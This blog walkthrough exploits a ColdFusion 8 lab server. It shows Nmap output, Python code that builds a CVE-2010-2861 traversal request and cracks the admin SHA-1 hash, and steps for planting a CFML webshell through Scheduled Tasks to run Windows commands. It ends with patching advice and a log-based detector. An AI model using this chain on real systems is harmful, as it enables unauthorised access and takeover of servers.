Exploiting ColdFusion 8 Server

Aung Myo Myint
Published in Horangi, Jun 21, 2017

Adobe ColdFusion is a commercial web application development platform created by J.J. Allaire in 1995. Applications are written in CFML, the ColdFusion Markup Language. ColdFusion was originally built to connect simple HTML pages to a database. On July 30, 2007, Adobe Systems released ColdFusion 8, with performance and feature improvements over previous versions.

However, ColdFusion 8 has had several serious vulnerabilities: information disclosure, cross-site scripting (XSS), SQL injection and exposure of the administrator interface. A quick Google search shows that versions vulnerable to the information-disclosure bug are still in use today.

In this example I am going to demonstrate exploiting a ColdFusion 8 server and ending up with a webshell on it.

Nmap Scan

Fire up Kali Linux and run a basic Nmap scan with the -A flag (OS and service detection plus the default NSE scripts) against the target; we are looking for a web service on TCP/80 or TCP/443.

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-06-14 23:32 EDT
Nmap scan report for 192.168.0.4
Host is up (0.22s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 4.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/4.0
|_http-title: Hack ME!
MAC Address: 00:50:56:89:15:C0 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP
Running (JUST GUESSING): Microsoft Windows 2003|XP|2000 (89%), Apple embedded (86%)

The scan shows an HTTP service (IIS) on TCP/80. Next we verify that ColdFusion is running behind it and check for known ColdFusion vulnerabilities with the Nmap NSE scripts http-vuln-cve2010-2861, http-coldfusion-subzero and http-adobe-coldfusion-apsa1301. In the screenshot below I ran http-vuln-cve2010-2861, which confirmed that the administrator interface is vulnerable to the CVE-2010-2861 directory traversal and used it to read password.properties, the file that holds the hash of the administrator password.

Figure 1: NSE script

Cracking the hash

Yay! We got the hash. ColdFusion 8 stores the administrator password as an unsalted SHA-1 hash, so it can be looked up in a precomputed table at https://crackstation.net/, which is what I did here. Two caveats: submitting a client's hash to a third-party site leaks it, so on a real engagement crack it offline instead (hashcat mode 100 is raw SHA-1); and cracking is not strictly required, because the ColdFusion 8 login form hashes the password client-side before submitting it, so the stored hash itself can be replayed against the login. Thanks to crackstation…

Figure 2: Crackstaion
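The two steps above, hash extraction through the traversal and offline cracking, as an added example that is not the article's code and not Nmap's script. The request shape and the ColdFusion 8 install-relative path are the ones the http-vuln-cve2010-2861 NSE script sends; the HTTP response body and the wordlist are constructed for the example, so it runs without network access.

```python
"""Added example: manual equivalent of the NSE hash extraction and the
crackstation lookup. Response body and wordlist are constructed; the
traversal request is the one Nmap's http-vuln-cve2010-2861 script uses."""
import hashlib
import re
from typing import Iterable, Optional


def traversal_url(base: str,
                  target: str = "ColdFusion8/lib/password.properties",
                  depth: int = 10) -> str:
    """Build the CVE-2010-2861 request against enter.cfm's 'locale' parameter.

    ColdFusion turns the locale name into a file path; the NUL byte (%00)
    truncates whatever it appends after the name, so the traversal lands on
    the target file. Ten '../' is what the NSE script uses: it only has to
    reach the drive root, extra levels are harmless on Windows.
    """
    return (base.rstrip("/")
            + "/CFIDE/administrator/enter.cfm?locale="
            + "../" * depth + target + "%00en")


# Lookbehind skips 'rdspassword=' so only the administrator entry matches.
HASH_RE = re.compile(r"(?<![A-Za-z])password=([0-9A-Fa-f]{40})")


def extract_hash(body: str) -> Optional[str]:
    """Pull the admin hash out of a page that echoes password.properties.

    Returns the 40-hex-digit SHA-1 in upper case, or None if it is absent.
    """
    m = HASH_RE.search(body)
    return m.group(1).upper() if m else None


def sha1_cf8(password: str) -> str:
    """ColdFusion 8 stores SHA-1(password) as upper-case hex, unsalted."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def crack_sha1(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline wordlist attack, the same thing hashcat mode 100 does at scale."""
    target = target_hex.upper()
    for word in candidates:
        word = word.rstrip("\r\n")          # tolerate lines read from a file
        if sha1_cf8(word) == target:
            return word
    return None


# Constructed: an enter.cfm response with the properties file echoed into it.
SAMPLE_RESPONSE = """<html><head><title>ColdFusion Administrator Login</title></head>
<body>
#Wed Jun 14 23:40:00 EDT 2017
rdspassword=E5F3F0B2F3B4A3E4B2A6C1D9E8F7A6B5C4D3E2F1
password=5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
encrypted=true
</body></html>
"""

# Constructed wordlist; on an engagement point this at a real list instead.
WORDLIST = ["admin", "coldfusion", "Summer2017", "password", "P@ssw0rd"]


if __name__ == "__main__":
    print("request :", traversal_url("http://192.168.0.4"))
    admin_hash = extract_hash(SAMPLE_RESPONSE)
    print("hash    :", admin_hash)
    print("cracked :", crack_sha1(admin_hash, WORDLIST))
```

The regex deliberately refuses to match `rdspassword=`; the RDS hash sits in the same file and is easy to grab by mistake. Other ColdFusion versions and the JRun-based layouts keep password.properties elsewhere, so `target` is a parameter rather than a constant.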

Logging into the administrator with the recovered password gives us full admin access to the Adobe ColdFusion 8 server.

Figure 3: Admin panel

Browsing through the administrator pages, I found the web server's document root under Server Settings > Mappings.

Figure 4: webserver location

Getting Shell on The Server

With the login we already have administrative privileges within ColdFusion. Now we dig deeper to turn that into command execution on the underlying Windows host. Kali Linux ships a wide variety of tools, so it is no surprise that there is a webshell for CFML in the default Kali directory /usr/share/webshells/cfm/cfexec.cfm. Start an apache2 server on the Kali machine to host this file, then upload it into the web directory found above (the ColdFusion administrator's Scheduled Tasks feature can fetch a URL and save the response to a file on the server's disk).

Figure 5: uploading the webshell

Browse to the location of the webshell in the web directory. This page lets us execute Windows commands on the server; they run with the privileges of the ColdFusion service account, which here is an administrator.

Figure 6: browsing webshell location

Figure 7: executing windows command

Figure 8: Proof of administrative privilege

In conclusion, an attacker who reaches an unpatched ColdFusion 8 administrator interface can end up executing commands as a highly privileged user: shutting down the web server or stealing confidential data. System administrators should keep ColdFusion patched, restrict network access to /CFIDE/administrator/ so it is not exposed to untrusted networks, and run the ColdFusion service under a low-privileged account rather than an administrator.
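As the defender's counterpart to the walkthrough, here is an added example (not from the article) that flags the three things it did, a CVE-2010-2861 traversal, administrator-interface access from an unexpected host, and a request for a known webshell file name, by reading IIS W3C log lines. The log lines are constructed to mimic the IIS 6 default field set, and the admin allowlist and webshell watchlist are assumptions to adapt per environment.

```python
"""Added example: detect the traversal, admin-interface access and webshell
requests from this walkthrough in IIS W3C logs. Log lines are constructed;
ADMIN_ALLOWLIST and WEBSHELL_NAMES are assumptions for the example."""
import re
from typing import Dict, Iterable, Iterator, List
from urllib.parse import unquote

ADMIN_ALLOWLIST = {"192.168.0.2"}   # assumption: hosts allowed to reach /CFIDE/administrator/
WEBSHELL_NAMES = {"cfexec.cfm"}     # Kali's default CFM webshell file name
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|%00|\x00)")

# Constructed IIS 6 style log with the #Fields directive that names the columns.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2017-06-14 23:32:01 192.168.0.4 GET /index.htm - 80 - 192.168.0.10 Mozilla/5.0+(compatible;+Nmap+Scripting+Engine) 200 0 0
2017-06-14 23:32:02 192.168.0.4 GET /CFIDE/administrator/enter.cfm locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en 80 - 192.168.0.10 Mozilla/5.0+(compatible;+Nmap+Scripting+Engine) 200 0 0
2017-06-14 23:45:10 192.168.0.4 POST /CFIDE/administrator/enter.cfm - 80 - 192.168.0.10 Mozilla/5.0+(X11;+Linux+x86_64) 302 0 0
2017-06-14 23:50:33 192.168.0.4 POST /cfexec.cfm - 80 - 192.168.0.10 Mozilla/5.0+(X11;+Linux+x86_64) 200 0 0
2017-06-15 09:10:00 192.168.0.4 GET /CFIDE/administrator/index.cfm - 80 - 192.168.0.2 Mozilla/5.0+(Windows+NT+5.2) 200 0 0
"""


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request line, keyed by the names in '#Fields:'.

    IIS writes spaces inside values as '+', so splitting on whitespace is safe.
    Lines whose column count does not match the header are skipped, not guessed.
    """
    fields: List[str] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue                      # #Software, #Date, #Version directives
        values = line.split()
        if not fields or len(values) != len(fields):
            continue
        yield dict(zip(fields, values))


def detect(records: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one alert dict per matching rule; a record can trigger several."""
    alerts: List[Dict[str, str]] = []
    for r in records:
        stem, query, client = r["cs-uri-stem"], r["cs-uri-query"], r["c-ip"]
        uri = stem if query == "-" else f"{stem}?{query}"
        decoded = unquote(query) if query != "-" else ""

        # 1. Path traversal in the query string (the CVE-2010-2861 shape).
        if TRAVERSAL.search(query) or TRAVERSAL.search(decoded):
            alerts.append({"rule": "traversal", "client": client, "uri": uri})

        # 2. Administrator interface reached from a host not on the allowlist.
        if stem.lower().startswith("/cfide/administrator/") and client not in ADMIN_ALLOWLIST:
            alerts.append({"rule": "admin-interface", "client": client, "uri": uri})

        # 3. Request for a file name on the webshell watchlist.
        if stem.rsplit("/", 1)[-1].lower() in WEBSHELL_NAMES:
            alerts.append({"rule": "webshell", "client": client, "uri": uri})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_w3c(SAMPLE_LOG)):
        print(f"{a['rule']:15} {a['client']:14} {a['uri']}")
```

Rule 2 is the one that matters most after patching: the traversal only works because /CFIDE/administrator/ was reachable from the attacker's network in the first place, so any hit on that path from outside the allowlist deserves a look regardless of what the query string contains.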
